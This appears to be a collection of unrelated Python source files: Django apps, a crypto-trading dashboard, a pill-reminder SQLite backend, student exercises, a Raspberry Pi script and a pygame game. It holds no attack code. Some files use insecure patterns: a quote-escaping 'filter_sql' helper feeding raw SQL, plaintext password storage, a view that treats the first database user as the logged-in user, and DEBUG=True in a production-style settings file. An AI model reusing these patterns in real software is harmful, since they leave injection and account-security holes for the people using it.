for i, device in enumerate(device_list, start=1):
self.stdout.write("[{}/{}] {}: ".format(i, device_count, device.name), ending='')
# Skip inactive devices
if not device.status:
self.stdout.write("Skipped (inactive)")
continue
# Skip devices without primary_ip set
if not device.primary_ip:
self.stdout.write("Skipped (no primary IP set)")
continue
# Skip devices which have already been inventoried if not doing a full update
if device.serial and not options['full']:
self.stdout.write("Skipped (Serial: {})".format(device.serial))
continue
RPC = device.get_rpc_client()
if not RPC:
self.stdout.write("Skipped (no RPC client available for platform {})".format(device.platform))
continue
# Connect to device and retrieve inventory info
try:
with RPC(device, self.username, self.password) as rpc_client:
inventory = rpc_client.get_inventory()
except KeyboardInterrupt:
raise
except (AuthenticationError, AuthenticationException):
self.stdout.write("Authentication error!")
continue
except Exception as e:
self.stdout.write("Error: {}".format(e))
continue
if options['verbosity'] > 1:
self.stdout.write("")
self.stdout.write("\tSerial: {}".format(inventory['chassis']['serial']))
self.stdout.write("\tDescription: {}".format(inventory['chassis']['description']))
for module in inventory['modules']:
self.stdout.write("\tModule: {} / {} ({})".format(module['name'], module['part_id'],
module['serial']))
else:
self.stdout.write("{} ({})".format(inventory['chassis']['description'], inventory['chassis']['serial']))
if not options['fake']:
with transaction.atomic():
# Update device serial
if device.serial != inventory['chassis']['serial']:
device.serial = inventory['chassis']['serial']
device.save()
Module.objects.filter(device=device, discovered=True).delete()
create_modules(inventory.get('modules', []))
self.stdout.write("Finished!")
|
from django import template
from ticker_app.models import ExchangeTicker
from tradeBOT.models import CoinMarketCupCoin, UserMainCoinPriority, Pair, ExchangeMainCoin, UserPair
from trade.models import UserBalance
register = template.Library()
@register.filter(name='user_have_coin')
def user_holdings(coin_symbol, user_exchange):
try:
user_hold = UserBalance.objects.get(ue_id=user_exchange, coin=coin_symbol)
return user_hold.total
except UserBalance.DoesNotExist:
return 0
@register.filter(name='get_coinmarket_id')
def get_coinmarket_id(symbol):
try:
coin_market_id = CoinMarketCupCoin.objects.filter(symbol=symbol).earliest('rank')
return coin_market_id.coin_market_id
except CoinMarketCupCoin.DoesNotExist:
return ''
@register.inclusion_tag('tradeBOT/user_primary.html')
def get_user_primary_coins(user_exchange, primary_coin):
try:
umcp = UserMainCoinPriority.objects.get(user_exchange=user_exchange, main_coin=primary_coin)
return {'coin': umcp,
'success': True}
except UserMainCoinPriority.DoesNotExist:
return {'success': False}
@register.inclusion_tag('tradeBOT/get_primary_pairs.html')
def get_primary_pairs(coin, user_exchange):
try:
pairs = Pair.objects.filter(main_coin=coin, second_coin__rank__lte=100).order_by('is_active',
'second_coin__symbol')
return {'pairs': pairs, 'user_exchange': user_exchange}
except Pair.DoesNotExist:
return None
@register.filter(name='get_last')
def get_last(pair, user_exchange):
# return 0
max_pk = ExchangeTicker.objects.filter(exchange_id=user_exchange.exchange.pk, pair_id=pair.pk).order_by(
'-id').first().pk
ticker = ExchangeTicker.objects.get(pk=max_pk).last
if ticker is not None:
return round(ticker, 8)
else:
return 0
@register.filter(name='get_change_percent')
def get_change_percent(pair, user_exchange):
# return 0
max_pk = ExchangeTicker.objects.filter(exchange_id=user_exchange.exchange.pk, pair_id=pair.pk).order_by(
'-id').first().pk
ticker = ExchangeTicker.objects.get(pk=max_pk).percent_change
if ticker is not None:
return round(ticker * 100, 2)
else:
return 0
@register.filter(name='is_pair_active')
def is_pair_active(user_pair, user_exchange_pk):
main_coin = user_pair.pair.main_coin
try:
exch_primary = ExchangeMainCoin.objects.get(coin=main_coin)
user_primary_coin = UserMainCoinPriority.objects.get(user_exchange_id=user_exchange_pk, main_coin=exch_primary)
return user_primary_coin.is_active
except ExchangeMainCoin.DoesNotExist:
return False
except UserMainCoinPriority.DoesNotExist:
return True
@register.filter(name='user_pair_rate_of_change')
def user_pair_rate_of_change(user_pair_pk):
try:
user_pair = UserPair.objects.get(pk=user_pair_pk)
return user_pair.rate_of_change
except UserPair.DoesNotExist:
return float(0)
@register.filter(name='user_pair_interval_change')
def user_pair_interval_change(user_pair_pk):
try:
user_pair = UserPair.objects.get(pk=user_pair_pk)
return user_pair.change_interval
except UserPair.DoesNotExist:
return 0
@register.filter(name='multiple')
def multiple(value, factor):
return value * factor
@register.filter(name='haven_percent')
def haven_percent(coin, ue):
try:
user_balance = UserBalance.objects.get(ue=ue, coin=coin.symbol.lower())
coin_total_btc = user_balance.btc_value
except UserBalance.DoesNotExist:
coin_total_btc = 0
return coin_total_btc / (ue.total_btc / 100)
|
"""NickJuliaOnlineJournal URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from core import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.homeredirect, name="homeredirect"),
path('<typeDeleted>/', views.home, name="home"),
path('aboutus', views.splash, name="splash"),
path('journalstats', views.journal_stats, name="journalstats"),
path('piecharts', views.piecharts, name="piecharts"),
path('favorite/<theEntry>/<whichT>/', views.favorite, name='favorite'),
path('pin/<theEntry>/<whichT>/', views.pin, name='pin'),
path('delete/<theEntry>/<whichT>/', views.delete, name='delete'),
path('login', views.login_, name="login"),
path('signup', views.signup, name="login"),
path('logout', views.logout_, name="logout"),
]
|
# 4.10.10.py
# This program displays information about a rectangle drawn by the user.
# import libraries
from graphics import *
from math import sqrt
def main():
win = GraphWin("Triangle Information",400, 400)
for i in range(1):
p1 = win.getMouse()
p2 = win.getMouse()
p3 = win.getMouse()
# components needed
aX = p1.getX()-p2.getX()
aY = p1.getY()-p2.getY()
bX = p2.getX()-p3.getX()
bY = p2.getY()-p3.getY()
cX = p3.getX()-p1.getX()
cY = p3.getY()-p1.getY()
a = sqrt((aX**2)+(aY**2))
b = sqrt((bX**2)+(bY**2))
c = sqrt((cX**2)+(cY**2))
s = ((a + b + c)/2)
# Calculating area
area = sqrt(s*(s-a)*(s-b)*(s-c))
# triangle shape
triangle = Polygon(Point(p1.getX(),p1.getY()), Point(p2.getX(),p2.getY()), Point(p3.getX(),p3.getY())).draw(win)
# textual information
Text(Point(200,50),f"Area of the Triangle is {area}").draw(win)
#quiting prompt
quit = Text(Point(200,10),"Click again to quit")
quit.setStyle("bold")
quit.draw(win)
win.getMouse()
win.close()
main()
|
#!/usr/bin/env python3
__author__ = 'Wei Mu'
class Solution:
def getRow(self, rowIndex: int) -> List[int]:
if rowIndex == 0:
return [1]
ans = [1, 1]
for i in range(1, rowIndex+1):
temp = [None] * (i + 1)
temp[0] = temp[-1] = 1
for ind in range(1, i):
temp[ind] = ans[ind-1] + ans[ind]
ans = temp[:]
return ans
|
import RPi.GPIO as gpio
import time
import os
gpio.setmode(gpio.BCM)
gpio.setwarnings(False)
#gpio_setup
gpio.setup(4,gpio.OUT)
gpio.setup(15,gpio.IN,pull_up_down = gpio.PUD_UP)
#pwn_setup
pin = gpio.PWM(4,100)
pin.start(0)
try:
while True:
if gpio.input(15) == 0:
time.sleep(0.8)
if gpio.input(15):
#playaudiofile
os.system("sudo mpg123 /home/pi/iron-man-repulsor.mp3 &")
print(gpio.input(15))
x = 0
while x < 75:
x = x + 1
pin.ChangeDutyCycle(x)
time.sleep(0.0052)
for i in range(74,100):
pin.ChangeDutyCycle(i)
time.sleep(0.00134)
for o in range(100):
pin.ChangeDutyCycle(99 - o)
time.sleep(0.005)
elif gpio.input(15) == 0:
gpio.cleanup()
os.system("sudo shutdown -h now")
finally:
print("done")
gpio.cleanup()
|
from django.shortcuts import render, get_object_or_404
from .models import Board
from django.contrib.auth.models import User
from django.shortcuts import redirect
from .forms import NewTopicForm
def home(request):
boards = Board.objects.all()
return render(request, 'home.html', {'boards': boards})
def board_topics(request, pk):
board = Board.objects.get(pk=pk)
return render(request, 'topics.html', {'board': board})
def new_topic(request, pk):
board=get_object_or_404(Board, pk=pk)
user=User.objects.first() #get the logged in user
if request.method == 'POST':
form=NewTopicForm(request.POST)
if form.is_valid():
topic=form.save()
topic.board=board
topic.starter=user
topic.save()
post=Post.objects.create(
message=form.cleaned_data['message'],
topic=topic,
created_by=user
)
return redirect('board_topics', pk=board.pk)
else:
form = NewTopicForm()
return render(request, "new_topic.html", {'board': board, 'form':form})
|
from django.db import models
from django.contrib.auth.models import User
from users.models import User_more_info
from DjangoUeditor.models import UEditorField
# content = models.TextField()
class Article_type(models.Model):
id = models.AutoField(primary_key=True)
# 分类名称
name = models.CharField(max_length=150, unique=True, verbose_name="文章类别名称")
# 分类的图片
cover = models.ImageField(upload_to='static/articles/type_cover', default="/static/type_cover/default.jpg", verbose_name="文章类配图")
# 分类的描述
intro = models.TextField(verbose_name="文章类别描述")
# 父级类型
parent = models.ForeignKey('self', null=True, blank=True, verbose_name="父级类型", on_delete=models.CASCADE)
def __str__(self): # ____unicode____ on Python 2
return self.name
class Article(models.Model):
FROM_CHOICES = (
('yuanchuang', '原创'),
('zhuanzai', '转载'),
)
id = models.AutoField(primary_key=True)
title = models.CharField(max_length=66, null=False, verbose_name="文章标题")
content = UEditorField()
zhaiyao = models.CharField(max_length=520, verbose_name="文章摘要")
cover_img = models.ImageField(upload_to="static/articles/cover", verbose_name="文章封面图")
biaoqian = models.CharField(max_length=256, verbose_name="文章标签")
create_time = models.DateTimeField(auto_now_add=True, verbose_name="创建时间")
change_time = models.DateTimeField(auto_now=True, verbose_name="修改时间")
article_from = models.CharField(max_length=16, choices=FROM_CHOICES, default='yuanchuang')
article_type = models.ForeignKey(Article_type, on_delete=models.CASCADE, verbose_name="文章分类")
count = models.IntegerField(default=0, verbose_name="阅读量")
zan_num = models.IntegerField(default=0, verbose_name="点赞量")
user = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name="关联用户")
user_more_info = models.ForeignKey(User_more_info, on_delete=models.CASCADE, verbose_name="关联用户更多信息")
def __str__(self):
return self.title
class Article_zan_log(models.Model):
id = models.AutoField(primary_key=True)
link_user = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name="关联用户")
link_article = models.ForeignKey(Article, on_delete=models.CASCADE, verbose_name="关联文章")
def __str__(self):
return '{0}点赞了文章:{1}'.format(self.link_user, self.link_article)
# class Article_Count(models.Model):
# id = models.AutoField(primary_key=True)
# count = models.IntegerField(default=0, verbose_name="阅读量")
# link_article = models.OneToOneField(Article, on_delete=models.CASCADE)
class Article_pinglun(models.Model):
id = models.AutoField(primary_key=True)
content = models.TextField(verbose_name="评论内容")
create_time = models.DateTimeField(auto_now_add=True, verbose_name="创建时间")
# 关联文章
article = models.ForeignKey(Article, on_delete=models.CASCADE, verbose_name="关联文章")
# 关联用户
user = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name="关联用户")
user_more_info = models.ForeignKey(User_more_info, on_delete=models.CASCADE, verbose_name="关联用户更多信息")
# 评论自关联 为评论的回复1
pinglun_parent = models.ForeignKey('self', null=True, blank=True, on_delete=models.CASCADE, verbose_name="评论自关联父级")
class Favorites(models.Model):
id = models.AutoField(primary_key=True)
user = models.ForeignKey(User, on_delete=models.CASCADE)
favorites_articles = models.ForeignKey(Article, on_delete=models.CASCADE)
create_time = models.DateTimeField(auto_now_add=True)
def __str__(self):
return '{0}收藏了文章:{1}'.format(self.user, self.favorites_articles)
|
#coding:utf-8
#引入函数
from utils import times
#调用函数
a = "itsource "
b = 10
s = times(a,b)
print "The multiplication of {0} and {1} is: \n{2}".format(a,b,s)
|
from heuristics.Generic_Heuristic import Generic_Heuristic
from heuristics.Single_Start_Greedy import Single_Start_Greedy
from math import ceil, factorial
import sys
from copy import deepcopy
import numpy as np
class Multi_Start_Greedy(Generic_Heuristic):
def __init__(self):
super().__init__()
self.starts = None # list of starting nodes
self.greedy_worker = Single_Start_Greedy()
def set_params(self, params):
self.starts = params["starts"]
def run_heuristic(self, params):
precomputed = {} # a map from ground_truth -> best_phi, best_b, max_log_like for all we've ever seen
multi_start_results = {}
self.greedy_worker.num_elements = self.num_elements
self.greedy_worker.optimization = self.optimization
self.greedy_worker.optimization_params = self.optimization_params
self.greedy_worker.weight = self.weight
for start in self.starts:
self.greedy_worker.start = start
start_str = np.array_str(np.array(list(start), dtype=float))
multi_start_results[start_str], precomputed = self.greedy_worker.run_heuristic({"precomputed":precomputed})
print("Start = " , start_str, "attempted %d possible ground truths" % len(multi_start_results[start_str]))
return multi_start_results
|
# Afficher les instructions
import random, time, pygame
# défini le canvas d'affichage
pygame.init()
width = 500
height = 300
window_size = ( width, height )
game_surface = pygame.display.set_mode(window_size)
# couleurs
color_black = ( 0, 0, 0 )
color_white = ( 255, 255, 255 )
# textes
labelFont = pygame.font.SysFont("Helvetica", 18)
# charge l'image de la balle
ball_rect = pygame.Rect(0, 0, 28, 28)
ball_rect.center = (width/2, height-34)
racket_rect = pygame.Rect(0, height - 20, 60, 15)
racket_rect.x = width/2 - racket_rect.w/2
colors = []
for c in range(0,10):
colors.append(( random.randint(100,240), random.randint(60,210), random.randint(30,180) ))
bricks = []
for r in range(0,4):
for i in range(0,10):
bricks.append(pygame.Rect(i*50, 70 + r*20, 48, 19))
# intialise le vecteur de déplacement
ball_speed_vectors = [ [5, -5], [-5, -5] ]
ball_speed_vector = ball_speed_vectors[ random.randint(0,1) ]
racket_speed_vector = [0, 0]
X = 0
Y = 1
balls = 10
running = True
paused = False
while running:
for event in pygame.event.get():
# pour le bouton de fermeture de la fenêtre, quitte le programme
if event.type == pygame.QUIT:
running = False
# pour l'utilisation des touches, modifie le vecteur de déplacement
if pygame.mouse.get_pressed():
paused = False
if event.type == pygame.KEYDOWN:
paused = False
if event.key == pygame.K_LEFT:
racket_speed_vector = [-20, 0]
if event.key == pygame.K_RIGHT:
racket_speed_vector = [20, 0]
if event.type == pygame.KEYUP:
racket_speed_vector = [0, 0]
# reaffiche le fond et les lignes
game_surface.fill(color_black)
# affiche les raquettes
racket_rect = racket_rect.move(racket_speed_vector)
pygame.draw.rect(game_surface, color_white, racket_rect)
for brick in bricks:
color = colors[ round(brick.x / 50) ]
pygame.draw.rect(game_surface, color, brick)
c = c + 1
# affiche la balle
if not paused:
ball_rect = ball_rect.move(ball_speed_vector)
for brick in bricks:
if ball_rect.colliderect(brick):
ball_speed_vector[Y] = -ball_speed_vector[Y]
bricks.remove(brick)
if ball_rect.colliderect(racket_rect):
ball_speed_vector[Y] = -ball_speed_vector[Y]
if ball_rect.bottom > height:
balls = balls - 1
ball_rect.center = (width/2, height-34)
ball_speed_vector = ball_speed_vectors[ random.randint(0,1) ]
paused = True
if ball_rect.top < 0:
ball_speed_vector[Y] = -ball_speed_vector[Y]
if ball_rect.left < 0 or ball_rect.right > width:
ball_speed_vector[X] = -ball_speed_vector[X]
pygame.draw.circle(game_surface, color_white, ball_rect.center, round(ball_rect.width/2))
# affiche le texte
label = labelFont.render("balls {0}".format(balls), True, color_white)
labelPosition = ( 10, 10 )
game_surface.blit(label, labelPosition)
# display buffer
pygame.display.flip()
|
# -*- encoding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
import sqlite3
import json
import datetime
import time
import calendar
import base64
import threading
memo_insert_sql = "insert into Memo (User, Date, Text, Image, medicine) values (?, ?, ?, ?, ?)"
memo_search_sql = "select * from Memo where User=? and Medicine=?"
memo_search_sql2 = "select * from Memo where User=?"
memo_position_search_sql = "select * from Memo where User=? and id=? and Medicine=?"
memo_delete_sql = "delete from memo where user=? and id=?"
memo_change_sql = "update memo set text=?, image=?, medicine=? where id=?"
register = "insert into User (Id, Password) values (?, ?)"
validation = "select * from User where id=?"
login = "select * from User where id=? and password=?"
medicine_add_sql = "insert into Medicine_name (User, medicine_name) values (?, ?)"
medicine_search_sql = "select * from Medicine_name where User = ?"
medicine_taking_sql = "select * from Medicine where User=? and Medicine_Name=? and Date >= ? and Date <= ?"
medicine_taken_sql = "insert into Medicine (User, Medicine_Name, Date) values (?, ?, ?)"
instant_report_add_sql = "insert into instant_report (hash_value, medicine_name, user_id) values (?, ?, ?)"
instant_report_search_sql = "select * from instant_report where hash_value = ?"
instant_report_delete_sql = "delete from instant_report where hash_value = ?"
conn = sqlite3.connect("CapsuleTimer.db", check_same_thread=False)
cur = conn.cursor()
lock = threading.Lock()
# Only for test
def change_DB(db):
global conn
global cur
conn = sqlite3.connect(db, check_same_thread=False)
cur = conn.cursor()
def instant_report_insert(hash_value, medicine_name, user_id):
result = {}
if hash_value == "" or medicine_name == "":
result['result'] = 'No'
else:
lock.acquire()
cur.execute(instant_report_add_sql, (hash_value, medicine_name, user_id))
conn.commit()
lock.release()
result['result'] = 'Yes'
return json.dumps(result)
def instant_report_search(hash_value):
result = {}
index = ["hash_value", "medicine_name", "user_id"]
lock.acquire()
cur.execute(instant_report_search_sql, (hash_value,))
lock.release()
data = cur.fetchall()[0]
print data
result["hash_value"] = data[1]
result["medicine_name"] = data[2]
result["user_id"] = data[3]
print result
return json.dumps(result)
def instant_report_delete(hash_value):
result = {}
try:
lock.acquire()
cur.execute(instant_report_delete_sql, (hash_value, ))
conn.commit()
lock.release()
result['result'] = 'Yes'
except Exception, e:
print e
result['result'] = 'No'
return json.dumps(result)
def web_insert_memo(user, date, text="", image="", medicine_name=""):
result = {}
if text == "" and image == "":
result['result'] = 'No'
else:
lock.acquire()
cur.execute(memo_insert_sql, (user, date, text, image, medicine_name))
conn.commit()
lock.release()
result['result'] = 'Yes'
return json.dumps(result)
def insert_memo(user, date, text="", image="", medicine_name=""):
result = {}
if text == "" and image == "":
result['result'] = 'No'
else:
lock.acquire()
cur.execute(memo_insert_sql, (user, date, text, "/image/"+user+datetime.datetime.fromtimestamp(date).strftime("%Y-%m-%d-%H-%M-%S"), medicine_name))
conn.commit()
lock.release()
with open("./image/"+user+datetime.datetime.fromtimestamp(date).strftime("%Y-%m-%d-%H-%M-%S")+".jpeg", 'wb') as f:
f.write(base64.decodestring(image))
result['result'] = 'Yes'
return json.dumps(result)
def search_memo(user, medicine_name):
result = {}
result["memo"] = []
index = ["id", "user", "time", "text", "image", "medicine_name"]
if medicine_name == "*":
lock.acquire()
cur.execute(memo_search_sql2, (user, ))
lock.release()
else:
lock.acquire()
cur.execute(memo_search_sql, (user, medicine_name))
lock.release()
data = cur.fetchall()
for d in data:
# print type(''.join(datetime.datetime.fromtimestamp(d[2]).strftime('%Y-%m-%d %H:%M:%S')))
d = list(d)
d[2] = ''.join(datetime.datetime.fromtimestamp(d[2]).strftime('%Y-%m-%d %H:%M:%S'))
result["memo"].append(dict(zip(index, list(d))))
return json.dumps(result)
def search_memos(user, position, medicine_name):
result = {}
index = ["id", "user", "time", "text", "image", "medicine_name"]
print memo_position_search_sql, user, position
lock.acquire()
cur.execute(memo_position_search_sql, (user, position, medicine_name))
data = cur.fetchall()
for d in data:
# print type(''.join(datetime.datetime.fromtimestamp(d[2]).strftime('%Y-%m-%d %H:%M:%S')))
d = list(d)
d[2] = ''.join(datetime.datetime.fromtimestamp(d[2]).strftime('%Y-%m-%d %H:%M:%S'))
result = dict(zip(index, list(d)))
lock.release()
return json.dumps(result)
def delete_memo(user, position):
result = {}
try:
lock.acquire()
cur.execute(memo_delete_sql, (user, position))
conn.commit()
lock.release()
result['result'] = 'Yes'
except:
result['result'] = 'No'
return json.dumps(result)
def change_memo(user, position, text, image, medicine_name, date):
result = {}
try:
lock.acquire()
cur.execute(memo_change_sql, (text, "/image/"+user+datetime.datetime.fromtimestamp(date).strftime("%Y-%m-%d-%H-%M-%S"), medicine_name, position))
with open("./image/"+user+datetime.datetime.fromtimestamp(date).strftime("%Y-%m-%d-%H-%M-%S")+".jpeg", 'wb') as f:
f.write(base64.decodestring(image))
conn.commit()
lock.release()
result['result'] = 'Yes'
print memo_change_sql, (text,medicine_name, position)
except Exception, e:
print e
result['result'] = 'No'
return json.dumps(result)
def user_validation(id):
result = {}
lock.acquire()
cur.execute(validation, (id,))
data = cur.fetchall()
lock.release()
if len(data) > 0:
result['result'] = 'No'
else:
result['result'] = 'Yes'
return json.dumps(result)
def user_register(id, password):
result = {}
lock.acquire()
cur.execute(register, (id, password))
conn.commit()
lock.release()
result['result'] = 'Yes'
return json.dumps(result)
def user_login(id, password):
result = {}
lock.acquire()
cur.execute(login, (id, password))
data = cur.fetchall()
lock.release()
print data, len(data)
if len(data) <= 0:
result['result'] = 'No'
else:
result['result'] = 'Yes'
return json.dumps(result)
def medicine_taking(user, medicine_name, from_date, to_date):
index = ["User", "Medicine_Name", "Date"]
result = {}
result["record"] = []
from_date = calendar.timegm(time.struct_time(time.strptime('%s-%s-%s' %(from_date[:4], from_date[4:6], from_date[6:]), '%Y-%m-%d'))) - 9*3600
to_date = calendar.timegm(time.struct_time(time.strptime('%s-%s-%s' % (to_date[:4], to_date[4:6], to_date[6:]), '%Y-%m-%d'))) - 9 * 3600
lock.acquire()
cur.execute(medicine_taking_sql, (str(user), unicode(medicine_name), from_date, to_date))
data = cur.fetchall()
lock.release()
for d in data:
d = list(d)
d[2] = ''.join(datetime.datetime.fromtimestamp(d[2]).strftime('%Y-%m-%d %H:%M:%S'))
result["record"].append(dict(zip(index, list(d))))
return json.dumps(result)
def medicine_taken(user, medicine_name, date):
result = {}
lock.acquire()
cur.execute(medicine_taken_sql, (user, medicine_name, date))
conn.commit()
lock.release()
result["result"] = "Yes"
return json.dumps(result)
def medicine_add(user, medicine_name):
result = {}
lock.acquire()
cur.execute(medicine_add_sql, (user, medicine_name))
conn.commit()
lock.release()
result["result"] = "Yes"
return json.dumps(result)
def medicine_search(user):
index = ["medicine_id", "User", "medicine"]
result = {}
result["record"] = []
lock.acquire()
cur.execute(medicine_search_sql, (user, ))
data = cur.fetchall()
lock.release()
for d in data:
d = list(d)
result["record"].append(dict(zip(index, list(d))))
return json.dumps(result)
|
def update(sql_statement, cursor, db):
cursor.execute(sql_statement)
db.commit()
def query_all(sql_statement, cursor):
num_row = cursor.execute(sql_statement)
if num_row > 0:
return list(cursor)
else:
return list()
def query_one(sql_statement, cursor):
num_row = cursor.execute(sql_statement)
if num_row > 0:
return list(cursor)[0]
else:
return list()
def format_date(date):
a = str(date).split("-")
return a[2] + "/" + a[1] + "/" + a[0]
def format_time(time):
a = str(time).split(":")
return a[0] + ":" + a[1]
def filter_sql(data_string):
return data_string.replace("'", "\\'")
|
from defaults import *
DEBUG=True
COMPRESS_ENABLED=True
ALLOWED_HOSTS=['127.0.0.1', 'localhost', 'crackit.com']
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'mocktest', 'templates_prod')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
STATIC_ROOT = os.path.join(PROJECT_ROOT, '../static_prod')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.